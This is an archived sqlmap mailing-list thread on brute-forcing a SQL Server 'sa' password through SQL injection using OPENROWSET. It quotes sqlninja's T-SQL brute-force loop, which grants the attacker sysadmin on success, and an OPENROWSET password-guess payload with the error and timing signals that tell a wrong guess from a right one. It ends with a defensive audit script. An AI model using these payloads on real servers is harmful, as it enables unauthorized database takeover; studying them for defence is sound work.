Thread: [sqlmap-users] bruteforce SA password using SQL INJECTION
From: juan m. <j.m...@gm...> - 2012-07-20 11:14:35
Is there a way to brute-force the SA password using SQL injection? This is the scenario: it is a database server (SQL Server 2008) without access to the internet (port 1433 is blocked); the current user is a normal user (low-privilege user). I cannot get the SA password hash. The question is, is there any tool, code or way to brute-force the SA password without direct access to the SQL Server? It is a request to add this functionality to sqlmap; I don't know if it is possible. Thanks.
From: Chris O. <chr...@gm...> - 2012-07-20 11:20:55
Hi Juan,

If OPENROWSET is enabled then it's possible to attack with a wordlist. This was disabled by default after SQL Server 2000 though, so it'd have to be enabled.

Chris
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-20 12:03:02
Hi Juan,

Microsoft SQL Server has a built-in function called OPENROWSET to query another DBMS (or the DBMS itself). Back in 2002 Chris Anley released a paper demonstrating how to abuse this function to perform a DBMS user's password brute-force attack within the MSSQL instance. A few years later the attack was automated in sqlninja [1]. We have an issue open on GitHub [2] to implement the same DBA password brute-force attack. We have the required code in place, see issue #34 [3], and will soon close the whole thing.

However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL 2005 RTM it is disabled by default, hence either the database administrator has manually enabled it, or you won't be able to abuse this function to brute-force the 'sa' (DBA) password hash or run statements on his behalf.

[1] http://sqlninja.sourceforge.net
[2] https://github.com/sqlmapproject/sqlmap/issues/31
[3] https://github.com/sqlmapproject/sqlmap/issues/34

Regards,
Bernardo

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
From: juan m. <j.m...@gm...> - 2012-07-24 13:26:36
I was trying sqlninja. This is the query it uses to brute-force the SA password with 1 character (numbers and letters):

    declare @p nvarchar(99), @z nvarchar(10), @s nvarchar(99), @a int, @q nvarchar(4000)
    set @a=1
    set @s=N'abcdefghijklmnopqrstuvwxyz0123456789'
    while @a<37
    begin
      set @p=N''
      set @z = substring(@s,@a,1)
      if @z='''' set @z=''''''
      set @p=@p+@z
      set @q=N'select 1 from OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select 1;exec master.dbo.sp_addsrvrolemember '''''+system_user+N''''',''''sysadmin'''' '')'
      exec master.dbo.xp_execresultset @q,N'master'
      set @a=@a+1
    end
    set @a=1

But I am receiving this error:

    Could not find stored procedure 'master.dbo.xp_execresultset'.

It was in the HTTP response. Is this error because OPENROWSET is disabled, or is it just that the SA password is not correct (like a "wrong password" error)?

Is there any way to check if OPENROWSET is enabled?

Thanks.
From: Chris O. <chr...@gm...> - 2012-07-25 09:16:00
Hi Juan,

I'm not convinced it's due to either of your suggestions. If OPENROWSET is disabled, you'll get an error message that begins something like:

    SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries' because this component is turned off as part of the security configuration for this server.

The statement that your instance of sqlninja is sending out differs from mine (are you using -m b -w /path/to/wordlist.txt?). My queries look similar to this:

    select * from OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=sa;pwd=passwordguess','waitfor delay ''0:0:59'';select 1;');--

If the sa password is incorrect, the error message should be along the lines of:

    Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'sa'.

If the sa password is correct, then you'll get the appropriate delay and probably a 200 response (though not necessarily, but you'll definitely get the delay).

I'm guessing that your error message is something to do with user permissions for the DBMS; a quick Google seemed to suggest that, but I'm confident it has little to do with OPENROWSET being disabled or an incorrect sa password. I assume you have mixed mode authentication in place on SQL Server?

You can check if OPENROWSET is enabled using sp_configure; see the following link for more information: http://social.msdn.microsoft.com/Forums/en/transactsql/thread/c3d3295b-933b-4ee8-934c-87c8d6a47260

Sorry to talk about a different SQL injection tool on this list. I would add that it'd be good to see some of the bits of sqlninja functionality that are missing from sqlmap implemented in the future if it's not already planned (not that there's a lot of missing functionality).

Cheers
Chris
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-25 10:44:39
Hi Juan,

master.dbo.xp_execresultset is a stored extended procedure available on Microsoft SQL Server 2000. It is not available on MSSQL 2005/2008 onwards by default, hence the error message, and the DBA brute-force attack fails.

Bernardo
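The thread turns on three server-side conditions (the 'Ad Hoc Distributed Queries' option behind OPENROWSET, the presence of xp_execresultset, and SQL logins being accepted) and on the "Login failed for user 'sa'" errors a loopback guess produces. The T-SQL below is an added audit for an administrator of the instance; it is not code from sqlninja, sqlmap or any poster, and it assumes a connection with sysadmin rights (needed for sp_configure and xp_readerrorlog).

```sql
-- 1. Is OPENROWSET/OPENDATASOURCE usable?  The switch is the
--    'Ad Hoc Distributed Queries' option, off by default since MSSQL 2005.
SELECT name, value_in_use              -- value_in_use = 1 means enabled
FROM sys.configurations
WHERE name = N'Ad Hoc Distributed Queries';

-- Same check through sp_configure (the option is "advanced", so it has to
-- be made visible first).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries';

-- 2. Does the extended procedure the sqlninja loop relies on exist?
--    On 2005/2008 this returns no rows, which matches the error in the thread.
SELECT name, type_desc
FROM master.sys.all_objects
WHERE name = N'xp_execresultset';

-- 3. Are SQL logins (mixed mode) accepted at all, and is 'sa' enabled?
--    A loopback 'uid=sa;pwd=...' connection needs both.  windows_only = 1
--    means Windows-only authentication.
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_only,
       is_disabled                                AS sa_disabled
FROM sys.sql_logins
WHERE name = N'sa';

-- 4. Detection: failed 'sa' logins in the current error log (error 18456).
--    A loopback brute force shows up as a burst of these whose client is the
--    server itself (assumed to be logged as [CLIENT: <local machine>] or
--    [CLIENT: 127.0.0.1]).  xp_readerrorlog arguments: log number (0 =
--    current), log type (1 = SQL Server log), two substring filters (AND).
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed for user ''sa''', N'CLIENT';

-- 5. Remediation when the option is on and no application needs it.
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
```

Run steps 1 to 4 read-only first; step 5 changes server configuration and should go through normal change control.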